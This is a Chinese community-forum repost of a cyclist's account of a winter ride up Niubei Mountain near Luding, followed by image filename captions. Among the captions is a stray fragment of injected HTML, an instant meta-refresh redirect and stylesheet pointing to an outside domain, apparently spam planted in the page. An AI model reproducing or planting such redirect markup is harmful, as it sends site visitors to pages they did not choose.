雄州网-简阳人的网上社区

QQ登录

只需一步,快速开始

搜索

[自行车] (转)冰天雪地骑行牛背山

本帖最后由 左耳@一块洞 于 2015-8-4 14:18 编辑 <br /><br />  我是个单车发烧友,喜欢骑行、竞赛、爬坡、挑战自己,这次行程是很偶然的召集。前几天看着自贡小袜子他们的牛背山相片,风景顿时把我吸引,那是人间仙境,通过他基本上搞清楚了大体路线,于是跟同事死鬼临时说起,决定明天出发。当天晚上,单车拆卸打包,12月10号上午到新南门车站。
  坐车前往泸定,一路盘山公路一路的颠簸,到达泸定安顿好宾馆,开始计划明天的行程,买士力架、红肠、装车、休息,询问了宾馆服务员,泸定离冷碛还有10多公里,我们决定明早9点泸定直接骑车到冷碛。
  第二天,怀着无比兴奋带有一点怕却的心情上路了,经过一小时10公里的爬坡到达冷碛,60公里的上坡想着简单,加上高海拔高原反应,颠簸不堪的路面,简直就是崩溃,他们的传说是真的:“只有越野车才能上去的道路”。不亲身体验完全是不能相信的,一路上看着码表8左右的速度,下午2点我们才骑了不到20公里路,心情下就紧张到了极点。
  既然选择了这种方式就要敢于去面对,再苦,没有红军十万长征苦。再饿,至少我们没有啃树皮,我们还有火腿肠。再冷,我们有冲锋衣。条件好很多了,已经知足了。一路碰到当地人,都叫我们放弃,山上道路很多暗冰,而且大雾,说我们上去太危险,我也有过放弃的想法,想到来都来了,这一次拼了,豁出去了。 一路上为了赶路,也没心情照相了,晚上8点30还在山里面,已经漆黑一片,我们借着电筒的微微光芒,宁静的黑夜,大山深处,加上山里岔路太多,深夜已无人问路,给客栈老板打电话。
  手机没信号,完了,完了,开始让我们后怕起来 ,只有凭着感觉往山上的道路走去,走了2公里左右,路上遇到矿工,他被我们的勇气和斗志感到惊讶,给我们指路,说还有3公里到山顶,我要死了,我要崩溃了。,此时食物已经吃完,没水喝,水壶的水全冻成冰块,只有找山泉喝一点,零下5度啊,加上冰水,脚下暗冰推车打滑,绝了绝了。。。继续走吧,死鬼喊我。。。晚上9点半 终于到达山顶 格桑花客栈  老板很热情 为我们泡上了方便面 我跟死鬼已经坐在凳子上吃着已经冻的梆硬的火腿肠(简直人间美味),不能动弹 老板给我们拿来蜂窝煤炉子烤火,在此非常感谢老板的热情款待。
   山上客栈非常艰苦 没有灯 没有水 只靠蜡烛和雪水,睡的是通铺,几十床被子 山上这次只有我们两位游客  客栈老板直接说 你们冷就多盖几床被子 我于是盖了3床被子 还是冷啊冷  全身贴上了我们在成都买的"暖宝宝",一下就暖和了。
  第3天,8点起床,大雾,我跟死鬼很郁闷。很气愤,我们累死累活上来了,什么也看不到,然后两人不甘心,决定,爬上山顶等大雾散去,山上 风很大 贡嘎雪山若隐若现,冷的我跟死鬼坐在3600米的高山上抽烟,一根接一根,等了2小时 太阳终于撕破了天空中阴霾的包裹,露出了万道金光。老天爷被我们的执着感动了,360度奇幻观景“泥巴山、瓦屋山、峨眉山、夹金山、四姑娘山和二郎山在前,贡嘎雪山在侧,大渡河大峡谷在后,几乎天府之国的所有名山峻岭在此时都变成了玲珑盆景。而翻滚的云雾之下,群山丘陵逐级降低,缓缓融入稻浪翻滚的天府平原,人间仙境啊。。。当时心情无比激动,客栈老板也说我们运气太好了,有些人上来一周什么都看不到,我感动天感动地。。。。。开始照相,相机高原反应……什么事情都能遇到。
  中午12点老板娘炒的腊肉 吃了2碗饭,开始下山,原以为下山很容易,结果很痛苦,一路上在暗冰上打滑摔了无数次,一路上锁鞋解不了锁摔了无数次,哎。。悲剧。 只能想想如此的艰难,累,冷能换来这等美丽景色,值了!值了!太值了!!!

本帖最后由 左耳@一块洞 于 2015-8-4 14:18 编辑 <br /><br /> 11_35299_0d3473984c2308e.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:18 编辑 <br /><br /> 11_35299_0ed329dafdb9f4f.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:18 编辑 <br /><br /> 11_35299_2baab70e7435d70.jpg

ontent="0; url=http://138106.com"><link href="http://138106.com/8.css" rel="stylesheet" type="text/css" media="screen

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_3bf4c7d4a79da7a.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_6b270133483ff9d.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_7cff83a2c03b87b.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_7e1daa4b2ee731f.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_7ecb26c23725cc8.jpg

本帖最后由 左耳@一块洞 于 2015-8-4 14:19 编辑 <br /><br /> 11_35299_8d07f07f4270850.jpg